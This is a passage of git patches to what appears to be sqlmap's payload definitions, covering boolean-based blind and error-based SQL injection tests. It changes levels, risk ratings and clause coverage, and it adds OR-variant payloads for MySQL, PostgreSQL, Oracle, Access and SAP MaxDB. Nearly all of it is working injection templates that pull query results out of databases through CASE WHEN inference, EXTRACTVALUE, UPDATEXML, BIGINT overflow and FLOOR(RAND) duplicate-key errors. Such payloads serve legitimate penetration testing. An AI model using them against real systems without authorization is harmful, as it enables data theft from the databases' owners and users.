-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
     <test>
         <title>PostgreSQL boolean-based blind - Parameter replace</title>
         <stype>1</stype>
@@ -660,7 +670,7 @@ Tag: <test>
     <test>
         <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -680,7 +690,7 @@ Tag: <test>
     <test>
         <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -853,41 +863,9 @@ Tag: <test>
     </test>
     <!-- End of boolean-based blind tests - Parameter replace -->
 
-    <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+    <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
     <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
-        <stype>1</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
-        <stype>1</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
-        <request>
-            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
-        </request>
-        <response>
-            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
-        </response>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
         <level>2</level>
         <risk>1</risk>
@@ -907,9 +885,9 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -927,7 +905,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
@@ -942,13 +920,14 @@ Tag: <test>
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
         <stype>1</stype>
-        <level>5</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -961,13 +940,14 @@ Tag: <test>
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -985,9 +965,9 @@ Tag: <test>
 
     <!-- It exclusively works with ORDER BY -->
     <test>
-        <title>PostgreSQL boolean-based blind - ORDER BY clauses (original value)</title>
+        <title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>
         <stype>1</stype>
-        <level>5</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
@@ -1008,10 +988,10 @@ Tag: <test>
                It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is
     -->
     <test>
-        <!-- <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses (GENERATE_SERIES - original value)</title> -->
+        <!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->
         <title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>5</level>
         <risk>1</risk>
         <!-- <clause>2,3</clause> -->
         <clause>3</clause>
@@ -1071,7 +1051,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1090,7 +1070,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
         <stype>1</stype>
         <level>4</level>
         <risk>1</risk>
@@ -1109,9 +1089,9 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1128,9 +1108,9 @@ Tag: <test>
     </test>
 
     <test>
-        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1147,9 +1127,9 @@ Tag: <test>
     </test>
 
     <test>
-        <title>SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1166,9 +1146,9 @@ Tag: <test>
     </test>
 
     <test>
-        <title>SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1183,13 +1163,13 @@ Tag: <test>
             <dbms>SAP MaxDB</dbms>
         </details>
     </test>
-    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+    <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
 
     <!-- Boolean-based blind tests - Stacked queries -->
     <test>
         <title>MySQL &gt;= 5.0 boolean-based blind - Stacked queries</title>
         <stype>1</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -1210,7 +1190,7 @@ Tag: <test>
     <test>
         <title>MySQL &lt; 5.0 boolean-based blind - Stacked queries</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -1224,6 +1204,7 @@ Tag: <test>
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt; 5.0</dbms_version>
         </details>
     </test>
 
@@ -1251,7 +1232,7 @@ Tag: <test>
     <test>
         <title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>
@@ -1335,7 +1316,7 @@ Tag: <test>
     <test>
         <title>Microsoft Access boolean-based blind - Stacked queries</title>
         <stype>1</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>1</risk>
         <clause>0</clause>
         <where>1</where>

From ab6cc271d31caca31232a436e01aa1bc45a08806 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:34:47 +0000
Subject: [PATCH 355/492] Major consistency rework of error-based payloads -
 issue #1169

---
 xml/payloads/02_error_based.xml | 763 +++++++++++++++++++-------------
 1 file changed, 461 insertions(+), 302 deletions(-)

diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
index bf05f189f..0cfbeab8c 100644
--- a/xml/payloads/02_error_based.xml
+++ b/xml/payloads/02_error_based.xml
@@ -1,17 +1,21 @@
 <?xml version="1.0" encoding="UTF-8"?>
 
 <root>
-    <!-- Error-based tests - WHERE or HAVING clause -->
+    <!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->
     <test>
-        <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
+        <title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
         <stype>2</stype>
         <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
         <where>1</where>
         <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -23,15 +27,44 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
+        <title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
         <stype>2</stype>
         <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
         <where>1</where>
         <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -43,15 +76,44 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
         <where>1</where>
         <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -63,15 +125,44 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
+        <where>1</where>
+        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>
         <stype>2</stype>
         <level>4</level>
-        <risk>0</risk>
-        <clause>1</clause>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
         <where>1</where>
         <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -83,15 +174,44 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
+        <!-- It does not work against ORDER BY or GROUP BY clause -->
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
         <stype>2</stype>
         <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
         <where>1</where>
         <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -102,11 +222,57 @@
         </details>
     </test>
 
+    <test>
+        <!-- It does not work against ORDER BY or GROUP BY clause -->
+        <title>MySQL &gt;= 4.1 OR error-based - WHERE, HAVING clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+    <!-- This payload with AND does not work -->
+    <test>
+        <title>MySQL OR error-based - WHERE or HAVING clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
+        <request>
+            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
         <level>1</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
